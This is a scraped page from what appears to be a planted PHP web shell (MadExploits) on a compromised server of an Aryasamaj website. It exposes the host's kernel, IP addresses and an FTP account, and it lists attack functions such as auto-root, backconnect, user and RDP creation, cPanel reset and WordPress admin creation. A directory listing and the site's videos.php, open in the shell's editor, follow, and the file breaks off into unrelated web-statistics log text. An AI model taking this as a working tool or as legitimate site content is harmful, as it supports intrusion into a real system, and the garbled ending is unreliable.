Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
thearyasamaj /
public_html /
mobile /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
flowplayer
[ DIR ]
drwxr-xr-x
mobilecommon
[ DIR ]
drwxr-xr-x
mobileimages
[ DIR ]
drwxr-xr-x
mobilejs
[ DIR ]
drwxr-xr-x
mp3player
[ DIR ]
drwxr-xr-x
appsgames.html
3.17
KB
-rw-r--r--
appsgames.php
4.16
KB
-rw-r--r--
comingevent.html
3.17
KB
-rw-r--r--
comingevent.php
7.6
KB
-rw-r--r--
comingevent_25-10-13.php
6.82
KB
-rw-r--r--
comingeventdetail.php
9.29
KB
-rw-r--r--
currentnewsdetail.php
8.17
KB
-rw-r--r--
disclaimer.html
3.17
KB
-rw-r--r--
disclaimer.php
2.79
KB
-rw-r--r--
downloadrigtone.php
228
B
-rw-r--r--
error_log
38.02
MB
-rw-r--r--
flowplayer.swf
4.05
KB
-rw-r--r--
index.php
7.84
KB
-rw-r--r--
index_25-10-13.php
6.67
KB
-rw-r--r--
index_29-10-12.html
3.17
KB
-rw-r--r--
index_31_oct.php
7.12
KB
-rw-r--r--
index_old.html
348
B
-rw-r--r--
policy.html
3.17
KB
-rw-r--r--
policy.php
2.79
KB
-rw-r--r--
ringtones.html
3.17
KB
-rw-r--r--
ringtones.php
4.7
KB
-rw-r--r--
ringtones_ds.php
3.89
KB
-rw-r--r--
ringtones_ds1.php
4.12
KB
-rw-r--r--
terms.html
3.18
KB
-rw-r--r--
terms.php
2.79
KB
-rw-r--r--
todaysevent.html
3.17
KB
-rw-r--r--
todaysevent.php
7.64
KB
-rw-r--r--
todaysevent_25-10-13.php
6.9
KB
-rw-r--r--
todayseventdetail.php
9.77
KB
-rw-r--r--
todayseventdetail_25-10-13.php
9.05
KB
-rw-r--r--
videos.html
3.17
KB
-rw-r--r--
videos.php
4.25
KB
-rw-r--r--
videosdetail.php
4.41
KB
-rw-r--r--
wallpapers.html
3.17
KB
-rw-r--r--
wallpapers.php
3.67
KB
-rw-r--r--
wallpapers_29-10-12.php
3.94
KB
-rw-r--r--
wallpapers_ds.php
3.96
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : videos.php
<!DOCTYPE html> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Aryasamaj</title> <link rel="stylesheet" href="css/mobile.css" type="text/css" /> <script type="text/javascript" src="mobilejs/common.js"></script> </head> <body> <div class="wrapper" data-role="page"><!-- wrapper start --> <div class="inner_wrapper"><!-- inner_wrapper start --> <div class="header"><!-- header start --> <div class="logo"> <a href="index.php"><img src="mobileimages/logo.png" alt="International Arya Mahasammelan 2012" /></a> </div> <h3>The Aryasamaj</h3> <div class="clr"></div> </div><!-- header end --> <div class="menu"><!-- menu start --> <ul> <li><a href="index.php" data-transition="slide" >Current News</a></li> <li><a href="comingevent.php">Coming Events</a></li> <li><a href="todaysevent.php">Today's Events</a></li> <li ><a href="wallpapers.php">Wallpapers</a></li> <li><a href="ringtones.php">Ringtones</a></li> <li class="active"><a href="videos.php">Videos</a></li> <li><a href="appsgames.php">Apps & Games</a></li> <div class="clr"></div> </ul> </div><!-- menu end --> <div class="clr"></div> <div class="content"><!-- content start --> <form action="videosdetail.php" method="post" name="frmvideoalbum" id="frmvideoalbum"> <input type="hidden" name="videoid" id="videoid" value="" /> <input type="hidden" name="videourl" id="videourl" value="" /> </form> <div><!--imgthumpart start--> <?php //created by dharmishtha include("mobilecommon/aryasamaj-clientconnection.php"); $selphoto="select * from arya_videoalbum ORDER BY va_id asc"; $qryphoto=mysql_query($selphoto); $numphoto=mysql_num_rows($qryphoto); $i=1; while($fetphoto=mysql_fetch_array($qryphoto)) { $vidalbmid=$fetphoto["va_id"]; $va_image=$fetphoto["va_image"]; $va_title=$fetphoto["va_title"]; if($i % 3 == 0) { echo "<div class=\"clr\"></div>"; } ?> <div class="vid_thumb"> <div> <a href='javascript:Redirectvideoalbum(<?php echo $vidalbmid;?>,"videosdetail.php"); '><img src="http://www.thearyasamaj.com/aryaadmin/images/videoalbum/<?php echo $va_image;?>" alt="" title="" height="133" width="237"/></a></div> <div class="vid_title"> <a href='javascript:Redirectvideoalbum(<?php echo $vidalbmid;?>,"videosdetail.php"); ' class="video_link"><?php echo $va_title;?></a></div> </div> <?php } ?> <div class="clr"></div> </div><!--imgthumpart end--> </div><!-- content end --> <div class="footer"><!-- footer start --> <div> <div class="social_icons"><!-- social_icons start --> <div class="soc_link"> <a href="http://www.twitter.com/thearyasamaj" target="_blank" ><img src="mobileimages/twitter.png" alt="Click here to visit our twitter page" title="Click here to visit our twitter page" /></a> <a href="http://www.facebook.com/arya.samaj" target="_blank"><img src="mobileimages/facebook.png" alt="Click here to visit our facebook page" title="Click here to visit our facebook page" /></a> </div> <div class="gww"><a href="#">Powered by</a> <a href="http://www.jbm-group.com" target="_blank"><img src="../images/jbmlogo.png" alt="JBM Group" width="46" height="14" align="absbottom" title="JBM Group" /></a></div> <div class="fb_like" > <iframe src="https://www.facebook.com/plugins/like.php?href=http://www.facebook.com/arya.samaj" scrolling="no" frameborder="0" style="border:none; float:left; width:100%; height:24px; margin:-10px 0 0 0;"> </iframe> </div> <div class="clr"></div> </div><!-- social_icons end --> </div> <div class="btm_link"><!-- btm_link start --> <div class="con_link"> <a href="disclaimer.php" >Dis_WORMS 0 END_WORMS # EMail - Hits - Bandwidth - Last visit # The 20 first Hits must be first (order not required for others) BEGIN_EMAILSENDER 0 END_EMAILSENDER # EMail - Hits - Bandwidth - Last visit # The 20 first hits must be first (order not required fo
Close